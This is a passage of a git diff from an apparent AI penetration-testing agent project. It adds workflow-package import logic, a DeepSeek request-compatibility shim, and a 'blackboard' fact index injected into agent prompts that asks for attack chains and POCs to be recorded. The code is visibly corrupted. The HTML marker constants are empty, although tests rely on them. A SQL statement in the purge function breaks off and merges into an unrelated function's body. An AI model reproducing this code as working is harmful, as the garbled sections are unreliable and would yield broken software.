+ rows, err = db.Query( + `SELECT `+workflowRunColumns+` FROM workflow_runs WHERE status = 'awaiting_hitl' AND conversation_id = ? ORDER BY started_at DESC LIMIT ?`, + conversationID, limit, + ) + } else { + rows, err = db.Query( + `SELECT `+workflowRunColumns+` FROM workflow_runs WHERE status = 'awaiting_hitl' ORDER BY started_at DESC LIMIT ?`, + limit, + ) + } + if err != nil { + return nil, fmt.Errorf("查询等待审批的工作流运行失败: %w", err) + } + defer rows.Close() + var out []*WorkflowRun + for rows.Next() { + row, err := scanWorkflowRun(rows) + if err != nil { + return nil, err + } + out = append(out, row) + } + return out, rows.Err() +} + +func (db *DB) migrateWorkflowRunsTable() error { + cols := []struct{ name, ddl string }{ + {"pending_hitl_node_id", "ALTER TABLE workflow_runs ADD COLUMN pending_hitl_node_id TEXT"}, + {"pending_hitl_json", "ALTER TABLE workflow_runs ADD COLUMN pending_hitl_json TEXT"}, + } + for _, col := range cols { + var count int + err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('workflow_runs') WHERE name=?", col.name).Scan(&count) + if err != nil || count > 0 { + continue + } + if _, err := db.Exec(col.ddl); err != nil { + errMsg := strings.ToLower(err.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + return err + } + } + } + return nil +} + +func nullString(v string) interface{} { + v = strings.TrimSpace(v) + if v == "" { + return nil + } + return v +} diff --git a/internal/database/workflow_package.go b/internal/database/workflow_package.go new file mode 100644 index 00000000..890c838b --- /dev/null +++ b/internal/database/workflow_package.go @@ -0,0 +1,286 @@ +package database + +import ( + "context" + "crypto/sha256" + "database/sql" + "encoding/hex" + "encoding/json" + "fmt" + "strings" + "time" + "unicode" + + "github.com/google/uuid" +) + +type WorkflowPackageInspection struct { + ID, PackageHash, ManifestJSON, WorkflowPayloadJSON, InspectionJSON string + SourceWorkflowID, SourceContentHash, SourceGraphHash string + SourceRevision int + LocalConflictState, LocalWorkflowID, LocalContentHash, LocalGraphHash string + CreatedBy, Status string + CreatedAt, ExpiresAt time.Time + ConsumedAt *time.Time +} + +type WorkflowPackageImport struct { + ID, InspectionID, RequestHash, IdempotencyKey, ActorUserID string + Action, SourceWorkflowID, TargetWorkflowID, ResultingWorkflowID string + Result, ErrorCode, ErrorMessage string + CreatedAt time.Time + AppliedAt *time.Time +} + +type WorkflowPackageApplyRequest struct { + InspectionID, RequestHash, IdempotencyKey, ActorUserID, Action, NewWorkflowID string + ConfirmOverwrite bool +} + +type WorkflowPackageStoreError struct{ Code, Message string } + +func (e *WorkflowPackageStoreError) Error() string { return e.Code + ": " + e.Message } +func workflowPackageStoreError(code, message string) error { + return &WorkflowPackageStoreError{code, message} +} + +func (db *DB) CreateWorkflowPackageInspection(v *WorkflowPackageInspection) error { + if v == nil || strings.TrimSpace(v.ID) == "" || strings.TrimSpace(v.CreatedBy) == "" { + return fmt.Errorf("workflow package inspection is incomplete") + } + if v.CreatedAt.IsZero() { + v.CreatedAt = time.Now().UTC() + } + if v.ExpiresAt.IsZero() { + v.ExpiresAt = v.CreatedAt.Add(30 * time.Minute) + } + _, err := db.Exec(`INSERT INTO workflow_package_inspections (id,package_hash,manifest_json,workflow_payload_json,inspection_json,source_workflow_id,source_revision,source_content_hash,source_graph_hash,local_conflict_state,local_workflow_id,local_content_hash,local_graph_hash,created_by,status,created_at,expires_at) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)`, v.ID, v.PackageHash, v.ManifestJSON, v.WorkflowPayloadJSON, v.InspectionJSON, v.SourceWorkflowID, v.SourceRevision, v.SourceContentHash, v.SourceGraphHash, v.LocalConflictState, nullString(v.LocalWorkflowID), nullString(v.LocalContentHash), nullString(v.LocalGraphHash), v.CreatedBy, "ready", v.CreatedAt.UTC(), v.ExpiresAt.UTC()) + return err +} + +func (db *DB) GetWorkflowPackageInspection(id, actor string) (*WorkflowPackageInspection, error) { + now := time.Now().UTC() + _, _ = db.Exec(`UPDATE workflow_package_inspections SET status='expired' WHERE status='ready' AND expires_at <= ?`, now) + row, err := scanWorkflowPackageInspection(db.QueryRow(`SELECT id,package_hash,manifest_json,workflow_payload_json,inspection_json,source_workflow_id,source_revision,source_content_hash,source_graph_hash,local_conflict_state,COALESCE(local_workflow_id,''),COALESCE(local_content_hash,''),COALESCE(local_graph_hash,''),created_by,status,created_at,expires_at,consumed_at FROM workflow_package_inspections WHERE id=? AND created_by=?`, strings.TrimSpace(id), strings.TrimSpace(actor))) + if err == sql.ErrNoRows { + return nil, nil + } + return row, err +} + +func scanWorkflowPackageInspection(s interface{ Scan(...any) error }) (*WorkflowPackageInspection, error) { + var v WorkflowPackageInspection + var consumed sql.NullTime + err := s.Scan(&v.ID, &v.PackageHash, &v.ManifestJSON, &v.WorkflowPayloadJSON, &v.InspectionJSON, &v.SourceWorkflowID, &v.SourceRevision, &v.SourceContentHash, &v.SourceGraphHash, &v.LocalConflictState, &v.LocalWorkflowID, &v.LocalContentHash, &v.LocalGraphHash, &v.CreatedBy, &v.Status, &v.CreatedAt, &v.ExpiresAt, &consumed) + if consumed.Valid { + t := consumed.Time + v.ConsumedAt = &t + } + return &v, err +} + +func (db *DB) GetWorkflowPackageImport(id, actor string) (*WorkflowPackageImport, error) { + v, err := scanWorkflowPackageImport(db.QueryRow(`SELECT id,inspection_id,request_hash,idempotency_key,actor_user_id,action,source_workflow_id,target_workflow_id,COALESCE(resulting_workflow_id,''),result,COALESCE(error_code,''),COALESCE(error_message,''),created_at,applied_at FROM workflow_package_imports WHERE id=? AND actor_user_id=?`, strings.TrimSpace(id), strings.TrimSpace(actor))) + if err == sql.ErrNoRows { + return nil, nil + } + return v, err +} +func scanWorkflowPackageImport(s interface{ Scan(...any) error }) (*WorkflowPackageImport, error) { + var v WorkflowPackageImport + var applied sql.NullTime + err := s.Scan(&v.ID, &v.InspectionID, &v.RequestHash, &v.IdempotencyKey, &v.ActorUserID, &v.Action, &v.SourceWorkflowID, &v.TargetWorkflowID, &v.ResultingWorkflowID, &v.Result, &v.ErrorCode, &v.ErrorMessage, &v.CreatedAt, &applied) + if applied.Valid { + t := applied.Time + v.AppliedAt = &t + } + return &v, err +} + +func (db *DB) ApplyWorkflowPackageImport(ctx context.Context, req WorkflowPackageApplyRequest) (*WorkflowPackageImport, bool, error) { + tx, err := db.BeginTx(ctx, nil) + if err != nil { + return nil, false, err + } + defer tx.Rollback() + var existingHash string + previous, prevErr := scanWorkflowPackageImport(tx.QueryRowContext(ctx, `SELECT id,inspection_id,request_hash,idempotency_key,actor_user_id,action,source_workflow_id,target_workflow_id,COALESCE(resulting_workflow_id,''),result,COALESCE(error_code,''),COALESCE(error_message,''),created_at,applied_at FROM workflow_package_imports WHERE actor_user_id=? AND idempotency_key=?`, req.ActorUserID, req.IdempotencyKey)) + if prevErr == nil { + existingHash = previous.RequestHash + if existingHash != req.RequestHash { + return nil, false, workflowPackageStoreError("WFPKG_IDEMPOTENCY_KEY_REUSED", "幂等键已用于其他请求") + } + return previous, true, nil + } + if prevErr != sql.ErrNoRows { + return nil, false, prevErr + } + inspection, err := scanWorkflowPackageInspection(tx.QueryRowContext(ctx, `SELECT id,package_hash,manifest_json,workflow_payload_json,inspection_json,source_workflow_id,source_revision,source_content_hash,source_graph_hash,local_conflict_state,COALESCE(local_workflow_id,''),COALESCE(local_content_hash,''),COALESCE(local_graph_hash,''),created_by,status,created_at,expires_at,consumed_at FROM workflow_package_inspections WHERE id=? AND created_by=?`, req.InspectionID, req.ActorUserID)) + if err == sql.ErrNoRows { + return nil, false, workflowPackageStoreError("WFPKG_INSPECTION_NOT_FOUND", "预检不存在") + } + if err != nil { + return nil, false, err + } + now := time.Now().UTC() + if !inspection.ExpiresAt.After(now) || inspection.Status == "expired" { + _, _ = tx.ExecContext(ctx, `UPDATE workflow_package_inspections SET status='expired' WHERE id=?`, inspection.ID) + return nil, false, workflowPackageStoreError("WFPKG_INSPECTION_EXPIRED", "预检已过期") + } + if inspection.Status != "ready" { + return nil, false, workflowPackageStoreError("WFPKG_INSPECTION_CONSUMED", "预检已被使用") + } + var payload struct { + ID string `json:"id"` + Name string `json:"name"` + Description string `json:"description"` + GraphJSON string `json:"graph_json"` + Enabled bool `json:"enabled"` + } + if err := json.Unmarshal([]byte(inspection.WorkflowPayloadJSON), &payload); err != nil { + return nil, false, fmt.Errorf("decode inspection payload: %w", err) + } + targetID := inspection.SourceWorkflowID + if req.Action == "rename" { + targetID = strings.TrimSpace(req.NewWorkflowID) + if !validWorkflowPackageID(targetID) { + return nil, false, workflowPackageStoreError("WFPKG_INVALID_RENAME_ID", "新工作流 ID 无效") + } + } + sourceCurrent, err := scanWorkflowDefinition(tx.QueryRowContext(ctx, "SELECT "+workflowDefinitionColumns+" FROM workflow_definitions WHERE id=?", inspection.SourceWorkflowID)) + if err == sql.ErrNoRows { + sourceCurrent = nil + } else if err != nil { + return nil, false, err + } + if err := checkWorkflowPackageSnapshot(inspection, sourceCurrent, inspection.SourceWorkflowID); err != nil { + return nil, false, err + } + current := sourceCurrent + if targetID != inspection.SourceWorkflowID { + current, err = scanWorkflowDefinition(tx.QueryRowContext(ctx, "SELECT "+workflowDefinitionColumns+" FROM workflow_definitions WHERE id=?", targetID)) + if err == sql.ErrNoRows { + current = nil + } else if err != nil { + return nil, false, err + } + } + result := "" + resultingID := "" + switch req.Action { + case "create": + if inspection.LocalConflictState != "none" || current != nil { + return nil, false, workflowPackageStoreError("WFPKG_ID_CONFLICT", "目标工作流已存在") + } + result = "created" + resultingID = targetID + case "keep_existing": + if inspection.LocalConflictState == "none" { + return nil, false, workflowPackageStoreError("WFPKG_ID_CONFLICT", "当前预检不允许保留本地") + } + if inspection.LocalConflictState == "identical" { + result = "skipped_identical" + } else { + result = "kept_existing" + } + resultingID = targetID + case "overwrite": + if inspection.LocalConflictState != "id_conflict" { + return nil, false, workflowPackageStoreError("WFPKG_ID_CONFLICT", "当前预检不允许覆盖") + } + if !req.ConfirmOverwrite { + return nil, false, workflowPackageStoreError("WFPKG_OVERWRITE_CONFIRMATION_REQUIRED", "覆盖需要确认") + } + result = "overwritten" + resultingID = targetID + case "rename": + if inspection.LocalConflictState != "id_conflict" || current != nil { + return nil, false, workflowPackageStoreError("WFPKG_ID_CONFLICT", "当前预检不允许另存") + } + result = "renamed" + resultingID = targetID + default: + return nil, false, workflowPackageStoreError("WFPKG_INVALID_ACTION", "导入动作无效") + } + if result == "created" || result == "renamed" { + _, err = tx.ExecContext(ctx, `INSERT INTO workflow_definitions (id,name,description,version,graph_json,enabled,created_at,updated_at) VALUES (?,?,?,?,?,?,?,?)`, resultingID, payload.Name, payload.Description, 1, payload.GraphJSON, boolToInt(payload.Enabled), now, now) + } else if result == "overwritten" { + _, err = tx.ExecContext(ctx, `UPDATE workflow_definitions SET name=?,description=?,version=version+1,graph_json=?,enabled=?,updated_at=? WHERE id=?`, payload.Name, payload.Description, payload.GraphJSON, boolToInt(payload.Enabled), now, resultingID) + } + if err != nil { + return nil, false, err + } + imp := &WorkflowPackageImport{ID: "wpii_" + strings.ReplaceAll(uuid.NewString(), "-", ""), InspectionID: inspection.ID, RequestHash: req.RequestHash, IdempotencyKey: req.IdempotencyKey, ActorUserID: req.ActorUserID, Action: req.Action, SourceWorkflowID: inspection.SourceWorkflowID, TargetWorkflowID: targetID, ResultingWorkflowID: resultingID, Result: result, CreatedAt: now, AppliedAt: &now} + _, err = tx.ExecContext(ctx, `INSERT INTO workflow_package_imports (id,inspection_id,request_hash,idempotency_key,actor_user_id,action,source_workflow_id,target_workflow_id,resulting_workflow_id,result,created_at,applied_at) VALUES (?,?,?,?,?,?,?,?,?,?,?,?)`, imp.ID, imp.InspectionID, imp.RequestHash, imp.IdempotencyKey, imp.ActorUserID, imp.Action, imp.SourceWorkflowID, imp.TargetWorkflowID, nullString(imp.ResultingWorkflowID), imp.Result, now, now) + if err != nil { + return nil, false, err + } + if _, err = tx.ExecContext(ctx, `UPDATE workflow_package_inspections SET status='consumed',consumed_at=? WHERE id=? AND status='ready'`, now, inspection.ID); err != nil { + return nil, false, err + } + if err = tx.Commit(); err != nil { + return nil, false, err + } + return imp, false, nil +} + +func checkWorkflowPackageSnapshot(i *WorkflowPackageInspection, current *WorkflowDefinition, targetID string) error { + if i.LocalConflictState == "none" { + if current != nil { + return workflowPackageStoreError("WFPKG_CONFLICT_CHANGED", "本地工作流已变化") + } + return nil + } + if current == nil || current.ID != i.LocalWorkflowID || current.ID != targetID { + return workflowPackageStoreError("WFPKG_CONFLICT_CHANGED", "本地工作流已变化") + } + content, graph := workflowDefinitionPackageHashes(current) + if content != i.LocalContentHash || graph != i.LocalGraphHash { + return workflowPackageStoreError("WFPKG_CONFLICT_CHANGED", "本地工作流已变化") + } + return nil +} +func workflowDefinitionPackageHashes(w *WorkflowDefinition) (string, string) { + var g any + dec := json.NewDecoder(strings.NewReader(w.GraphJSON)) + dec.UseNumber() + _ = dec.Decode(&g) + graph, _ := json.Marshal(g) + payload := struct { + ID string `json:"id"` + Name string `json:"name"` + Description string `json:"description,omitempty"` + Version int `json:"version"` + GraphJSON string `json:"graph_json"` + Enabled bool `json:"enabled"` + }{w.ID, w.Name, w.Description, w.Version, string(graph), w.Enabled} + b, _ := json.Marshal(payload) + return workflowPackageHash(b), workflowPackageHash(graph) +} +func workflowPackageHash(b []byte) string { + s := sha256.Sum256(b) + return "sha256:" + hex.EncodeToString(s[:]) +} +func validWorkflowPackageID(id string) bool { + if len(id) < 1 || len(id) > 128 { + return false + } + for _, r := range id { + if unicode.IsControl(r) { + return false + } + } + return true +} + +func (db *DB) PurgeWorkflowPackageLifecycle(now time.Time) error { + now = now.UTC() + if _, err := db.Exec(`UPDATE workflow_package_inspections SET status='expired' WHERE status='ready' AND expires_at<=?`, now); err != nil { + return err + } + if _, err := db.Exec(`DELETE FROM workflow_package_inspections WHERE status='expired' AND expires_at 0 { + out = append(out, model.WithStop(common.Stop)) + } + if common.Tools != nil { + out = append(out, model.WithTools(common.Tools)) + } + return out +} diff --git a/internal/llm/claude.go b/internal/llm/claude.go new file mode 100644 index 00000000..85c9bf76 --- /dev/null +++ b/internal/llm/claude.go @@ -0,0 +1,60 @@ +package llm + +import ( + "context" + "net/http" + "strings" + + "cyberstrike-ai/internal/config" + + agenticclaude "github.com/cloudwego/eino-ext/components/model/agenticclaude" + "github.com/cloudwego/eino/components/model" + "github.com/cloudwego/eino/schema" +) + +func IsClaudeProvider(provider string) bool { + provider = strings.ToLower(strings.TrimSpace(provider)) + return provider == "claude" || provider == "anthropic" +} + +func NewClaudeAgenticModel( + ctx context.Context, + cfg config.OpenAIConfig, + httpClient *http.Client, + maxTokens int, + extraFields map[string]any, +) (model.AgenticModel, error) { + if maxTokens <= 0 { + maxTokens = cfg.MaxCompletionTokensEffective() + } + if cfg.IsDeepSeekEndpointOrModel() { + httpClient = newDeepSeekAnthropicCompatibleClient(httpClient) + } + return agenticclaude.New(ctx, &agenticclaude.Config{ + APIKey: strings.TrimSpace(cfg.APIKey), + BaseURL: strings.TrimSuffix(strings.TrimSpace(cfg.BaseURL), "/"), + Model: strings.TrimSpace(cfg.Model), + MaxTokens: maxTokens, + HTTPClient: httpClient, + ExtraFields: extraFields, + }) +} + +func AgenticText(msg *schema.AgenticMessage) (content, reasoning string) { + if msg == nil { + return "", "" + } + var contentParts, reasoningParts []string + for _, block := range msg.ContentBlocks { + if block == nil { + continue + } + switch { + case block.AssistantGenText != nil: + contentParts = append(contentParts, block.AssistantGenText.Text) + case block.Reasoning != nil: + reasoningParts = append(reasoningParts, block.Reasoning.Text) + } + } + return strings.Join(contentParts, ""), strings.Join(reasoningParts, "") +} diff --git a/internal/llm/deepseek_anthropic_compat.go b/internal/llm/deepseek_anthropic_compat.go new file mode 100644 index 00000000..19d5bf07 --- /dev/null +++ b/internal/llm/deepseek_anthropic_compat.go @@ -0,0 +1,76 @@ +package llm + +import ( + "bytes" + "encoding/json" + "fmt" + "io" + "net/http" +) + +// newDeepSeekAnthropicCompatibleClient compensates for DeepSeek's Anthropic +// endpoint lagging behind the current Anthropic SDK. The SDK emits +// {"type":"custom"} for function tools, while DeepSeek expects the older +// name/input_schema/description shape without that discriminator. +// +// This is a field-level compatibility fix; requests still originate from +// Eino's native agenticclaude model and remain Anthropic Messages API requests. +func newDeepSeekAnthropicCompatibleClient(base *http.Client) *http.Client { + if base == nil { + base = http.DefaultClient + } + cloned := *base + transport := base.Transport + if transport == nil { + transport = http.DefaultTransport + } + cloned.Transport = &deepSeekAnthropicCompatRoundTripper{base: transport} + return &cloned +} + +type deepSeekAnthropicCompatRoundTripper struct { + base http.RoundTripper +} + +func (rt *deepSeekAnthropicCompatRoundTripper) RoundTrip(req *http.Request) (*http.Response, error) { + if req == nil || req.Body == nil || req.Method != http.MethodPost { + return rt.base.RoundTrip(req) + } + body, err := io.ReadAll(req.Body) + if err != nil { + return nil, fmt.Errorf("read DeepSeek Anthropic request: %w", err) + } + _ = req.Body.Close() + + var payload map[string]any + if err := json.Unmarshal(body, &payload); err != nil { + req.Body = io.NopCloser(bytes.NewReader(body)) + return rt.base.RoundTrip(req) + } + tools, ok := payload["tools"].([]any) + if !ok { + req.Body = io.NopCloser(bytes.NewReader(body)) + return rt.base.RoundTrip(req) + } + changed := false + for _, rawTool := range tools { + tool, ok := rawTool.(map[string]any) + if !ok || tool["type"] != "custom" { + continue + } + delete(tool, "type") + changed = true + } + if changed { + body, err = json.Marshal(payload) + if err != nil { + return nil, fmt.Errorf("marshal DeepSeek Anthropic request: %w", err) + } + } + req.Body = io.NopCloser(bytes.NewReader(body)) + req.ContentLength = int64(len(body)) + req.GetBody = func() (io.ReadCloser, error) { + return io.NopCloser(bytes.NewReader(body)), nil + } + return rt.base.RoundTrip(req) +} diff --git a/internal/llm/deepseek_anthropic_compat_test.go b/internal/llm/deepseek_anthropic_compat_test.go new file mode 100644 index 00000000..c75e692e --- /dev/null +++ b/internal/llm/deepseek_anthropic_compat_test.go @@ -0,0 +1,55 @@ +package llm + +import ( + "bytes" + "io" + "net/http" + "strings" + "testing" +) + +type captureRoundTripper struct { + body string +} + +func (rt *captureRoundTripper) RoundTrip(req *http.Request) (*http.Response, error) { + body, err := io.ReadAll(req.Body) + if err != nil { + return nil, err + } + rt.body = string(body) + return &http.Response{ + StatusCode: http.StatusOK, + Header: make(http.Header), + Body: io.NopCloser(bytes.NewReader(nil)), + Request: req, + }, nil +} + +func TestDeepSeekAnthropicCompatStripsOnlyCustomToolType(t *testing.T) { + t.Parallel() + capture := &captureRoundTripper{} + client := newDeepSeekAnthropicCompatibleClient(&http.Client{Transport: capture}) + req, err := http.NewRequest( + http.MethodPost, + "https://api.deepseek.com/anthropic/v1/messages", + strings.NewReader(`{"tools":[{"type":"custom","name":"mcp_tool","input_schema":{"type":"object"}},{"type":"web_search_20260209","name":"web_search"}]}`), + ) + if err != nil { + t.Fatalf("NewRequest: %v", err) + } + resp, err := client.Do(req) + if err != nil { + t.Fatalf("Do: %v", err) + } + _ = resp.Body.Close() + if strings.Contains(capture.body, `"type":"custom"`) { + t.Fatalf("custom discriminator was not removed: %s", capture.body) + } + if !strings.Contains(capture.body, `"type":"web_search_20260209"`) { + t.Fatalf("server tool discriminator was removed: %s", capture.body) + } + if !strings.Contains(capture.body, `"name":"mcp_tool"`) { + t.Fatalf("custom tool definition was removed: %s", capture.body) + } +} diff --git a/internal/project/blackboard.go b/internal/project/blackboard.go new file mode 100644 index 00000000..d1e2aec9 --- /dev/null +++ b/internal/project/blackboard.go @@ -0,0 +1,99 @@ +package project + +import ( + "fmt" + "strings" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/database" +) + +// AppendSystemPromptBlock 将附加块追加到 system prompt。 +func AppendSystemPromptBlock(base, block string) string { + base = strings.TrimSpace(base) + block = strings.TrimSpace(block) + if block == "" { + return base + } + if base == "" { + return block + } + return base + "\n\n" + block +} + +const ( + factIndexFooterGetDetail = "需要完整内容(攻击链、POC、请求响应等)时必须调用 get_project_fact(fact_key),禁止凭摘要臆造细节。" + factIndexFooterWriteHint = "写入事实 links 时用 from(来源 fact_key → 当前 fact),如 finding 上 {from:target/*, type:discovered_on};body 写可复现全流程(发现/利用类 fact_key 建议 finding|chain|exploit|poc/ 前缀)。" + factIndexFooterEmpty = "需要写入请使用 upsert_project_fact;需要详情请调用 get_project_fact(fact_key)。" +) + +// BuildFactIndexBlock 为 Agent 系统提示生成项目黑板索引(key + summary + 关系边 + 攻击路径,不含 body)。 +func BuildFactIndexBlock(db *database.DB, projectID string, cfg config.ProjectConfig) (string, error) { + if db == nil || !cfg.Enabled { + return "", nil + } + projectID = strings.TrimSpace(projectID) + if projectID == "" { + return "", nil + } + + proj, err := db.GetProject(projectID) + if err != nil { + return "", err + } + + facts, err := db.ListProjectFactsForIndex(projectID, cfg.DefaultInjectDeprecated) + if err != nil { + return "", err + } + allEdges, _ := db.ListProjectFactEdgesByProject(projectID) + _, incomingByTarget := indexEdgeGroupMaps(allEdges) + + if len(facts) == 0 { + return wrapFactIndexBlock(fmt.Sprintf("## 项目黑板索引(project: %s, id: %s)\n(暂无事实)\n%s", proj.Name, proj.ID, factIndexFooterEmpty)), nil + } + + sortFactsForIndex(facts) + + maxRunes := cfg.FactIndexMaxRunesEffective() + pathMaxRunes := cfg.FactIndexPathMaxRunesEffective() + footer := factIndexFooterGetDetail + "\n" + factIndexFooterWriteHint + footerRunes := len([]rune(footer)) + factsBudget := maxRunes - pathMaxRunes - footerRunes + if factsBudget < 800 { + factsBudget = maxRunes - footerRunes + pathMaxRunes = 0 + } + + indexedKeys := make(map[string]struct{}, len(facts)) + var b strings.Builder + b.WriteString(fmt.Sprintf("## 项目黑板索引(project: %s, id: %s)\n", proj.Name, proj.ID)) + used := len([]rune(b.String())) + omitted := 0 + + for _, f := range facts { + indexedKeys[f.FactKey] = struct{}{} + line := fmt.Sprintf("- [%s] %s — %s (%s)", f.FactKey, f.Category, strings.TrimSpace(f.Summary), f.Confidence) + line += FormatFactIndexLinksHint(f.FactKey, incomingByTarget[f.FactKey]) + line += "\n" + lineRunes := len([]rune(line)) + if used+lineRunes > factsBudget { + omitted++ + continue + } + b.WriteString(line) + used += lineRunes + } + + if omitted > 0 { + b.WriteString(fmt.Sprintf("\n(另有 %d 条未列入索引,请使用 list_project_facts 或 search_project_facts 查询。)\n", omitted)) + } + + if pathSection := BuildFactPathOverviewSection(allEdges, indexedKeys, pathMaxRunes); pathSection != "" { + b.WriteString("\n") + b.WriteString(pathSection) + } + + b.WriteString(footer) + return wrapFactIndexBlock(b.String()), nil +} diff --git a/internal/project/blackboard_refresh.go b/internal/project/blackboard_refresh.go new file mode 100644 index 00000000..6a494727 --- /dev/null +++ b/internal/project/blackboard_refresh.go @@ -0,0 +1,56 @@ +package project + +import "strings" + +// FactIndexSectionHeading 黑板索引可读标题行前缀(块内保留,供 Agent 阅读)。 +const FactIndexSectionHeading = "## 项目黑板索引" + +// FactIndexSectionStartMarker / EndMarker:HTML 注释边界,供程序化替换;对模型无指令语义。 +const ( + FactIndexSectionStartMarker = "" + FactIndexSectionEndMarker = "" +) + +// ReplaceFactIndexSection 用 freshIndex 替换 content 中已有的项目黑板索引段。 +// freshIndex 须为 BuildFactIndexBlock 的完整输出。起止 HTML 注释缺失时返回 (_, false)。 +func ReplaceFactIndexSection(content, freshIndex string) (string, bool) { + freshIndex = strings.TrimSpace(freshIndex) + if freshIndex == "" { + return content, false + } + start, ok := factIndexSectionStart(content) + if !ok { + return content, false + } + end, ok := factIndexSectionEnd(content, start) + if !ok || end <= start { + return content, false + } + return content[:start] + freshIndex + content[end:], true +} + +// wrapFactIndexBlock 为 BuildFactIndexBlock 正文加上统一起止 HTML 注释边界。 +func wrapFactIndexBlock(content string) string { + content = strings.TrimSpace(content) + return FactIndexSectionStartMarker + "\n" + content + "\n" + FactIndexSectionEndMarker + "\n" +} + +func factIndexSectionStart(content string) (int, bool) { + idx := strings.Index(content, FactIndexSectionStartMarker) + if idx < 0 { + return 0, false + } + return idx, true +} + +func factIndexSectionEnd(content string, start int) (int, bool) { + if start < 0 || start >= len(content) { + return 0, false + } + tail := content[start:] + idx := strings.LastIndex(tail, FactIndexSectionEndMarker) + if idx < 0 { + return 0, false + } + return start + idx + len(FactIndexSectionEndMarker), true +} diff --git a/internal/project/blackboard_refresh_test.go b/internal/project/blackboard_refresh_test.go new file mode 100644 index 00000000..31e9db4d --- /dev/null +++ b/internal/project/blackboard_refresh_test.go @@ -0,0 +1,154 @@ +package project + +import ( + "path/filepath" + "strings" + "testing" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +func sampleFactIndexWithFacts(projectLabel, summary string) string { + return wrapFactIndexBlock("## 项目黑板索引(project: " + projectLabel + ", id: x)\n" + + "- [target/a] target — " + summary + " (tentative)\n" + + factIndexFooterGetDetail + "\n" + + factIndexFooterWriteHint) +} + +func TestReplaceFactIndexSection(t *testing.T) { + t.Parallel() + oldIndex := sampleFactIndexWithFacts("p1", "old summary") + newIndex := sampleFactIndexWithFacts("p1", "new summary") + + t.Run("replaces index before next section", func(t *testing.T) { + content := "你是助手\n\n" + oldIndex + "\n\n## 图片分析\n看截图" + out, ok := ReplaceFactIndexSection(content, newIndex) + if !ok { + t.Fatal("expected replacement") + } + if strings.Contains(out, "old summary") { + t.Fatalf("old index should be gone: %q", out) + } + if !strings.Contains(out, "new summary") || !strings.Contains(out, "## 图片分析") { + t.Fatalf("expected new index and preserved vision section: %q", out) + } + if strings.Count(out, FactIndexSectionStartMarker) != 1 || strings.Count(out, FactIndexSectionEndMarker) != 1 { + t.Fatalf("expected exactly one start/end marker pair: %q", out) + } + }) + + t.Run("replaces index at end", func(t *testing.T) { + content := "## 项目测试范围\nscope\n\n" + oldIndex + out, ok := ReplaceFactIndexSection(content, newIndex) + if !ok { + t.Fatal("expected replacement") + } + if !strings.Contains(out, "## 项目测试范围") || !strings.Contains(out, "new summary") { + t.Fatalf("scope preserved, index updated: %q", out) + } + }) + + t.Run("summary with false markdown header does not truncate early", func(t *testing.T) { + summaryWithFakeHeader := "see\n\n## fake header in summary" + old := sampleFactIndexWithFacts("p1", summaryWithFakeHeader) + newIdx := sampleFactIndexWithFacts("p1", "new summary") + content := old + "\n\n## 图片分析\nvision" + out, ok := ReplaceFactIndexSection(content, newIdx) + if !ok { + t.Fatal("expected replacement") + } + if strings.Contains(out, "fake header in summary") { + t.Fatalf("old index tail should be fully removed: %q", out) + } + }) + + t.Run("summary containing end marker text does not truncate early", func(t *testing.T) { + summary := "note " + FactIndexSectionEndMarker + " in summary" + old := sampleFactIndexWithFacts("p1", summary) + newIdx := sampleFactIndexWithFacts("p1", "clean") + content := old + "\n\n## 图片分析\nvision" + out, ok := ReplaceFactIndexSection(content, newIdx) + if !ok { + t.Fatal("expected replacement") + } + if strings.Contains(out, "in summary") { + t.Fatalf("old block should be fully removed: %q", out) + } + }) + + t.Run("missing html markers does not replace", func(t *testing.T) { + legacy := "## 项目黑板索引(project: p1, id: x)\n- [a] note — old (tentative)\n" + newIdx := sampleFactIndexWithFacts("p1", "new") + out, ok := ReplaceFactIndexSection("prefix\n\n"+legacy, newIdx) + if ok { + t.Fatalf("expected no replacement without markers: %q", out) + } + }) + + t.Run("empty facts block", func(t *testing.T) { + oldEmpty := wrapFactIndexBlock("## 项目黑板索引(project: p1, id: x)\n(暂无事实)\n" + factIndexFooterEmpty) + newEmpty := sampleFactIndexWithFacts("p1", "first fact") + out, ok := ReplaceFactIndexSection(oldEmpty, newEmpty) + if !ok { + t.Fatal("expected replacement") + } + if strings.Contains(out, "(暂无事实)") { + t.Fatalf("old empty block should be gone: %q", out) + } + }) + + t.Run("no marker", func(t *testing.T) { + _, ok := ReplaceFactIndexSection("no blackboard here", newIndex) + if ok { + t.Fatal("expected false when marker missing") + } + }) + + t.Run("empty fresh index", func(t *testing.T) { + _, ok := ReplaceFactIndexSection(oldIndex, " ") + if ok { + t.Fatal("expected false for empty fresh index") + } + }) +} + +func TestFactIndexSectionBounds_useHTMLMarkers(t *testing.T) { + t.Parallel() + body := sampleFactIndexWithFacts("p", "line with\n\n## not a real section") + "TAIL_SHOULD_DROP" + start, ok := factIndexSectionStart(body) + if !ok || !strings.HasPrefix(body[start:], FactIndexSectionStartMarker) { + t.Fatalf("start should be at html start marker, got %d", start) + } + end, ok := factIndexSectionEnd(body, start) + if !ok || body[end:] != "\nTAIL_SHOULD_DROP" { + t.Fatalf("end should be after end marker, got remainder %q", body[end:]) + } +} + +func TestBuildFactIndexBlock_includesHTMLMarkers(t *testing.T) { + t.Parallel() + dbPath := filepath.Join(t.TempDir(), "facts.db") + db, err := database.NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + proj, err := db.CreateProject(&database.Project{Name: "marker-proj"}) + if err != nil { + t.Fatal(err) + } + block, err := BuildFactIndexBlock(db, proj.ID, config.ProjectConfig{Enabled: true}) + if err != nil { + t.Fatal(err) + } + if !strings.HasPrefix(strings.TrimSpace(block), FactIndexSectionStartMarker) { + t.Fatalf("block should start with start marker: %q", block) + } + if !strings.Contains(block, FactIndexSectionEndMarker) { + t.Fatalf("block should include end marker: %q", block) + } +} diff --git a/internal/project/fact_body_links.go b/internal/project/fact_body_links.go new file mode 100644 index 00000000..8c0bd39c --- /dev/null +++ b/internal/project/fact_body_links.go @@ -0,0 +1,256 @@ +package project + +import ( + "fmt" + "regexp" + "strings" + + "cyberstrike-ai/internal/database" +) + +var ( + bodyDepFactLine = 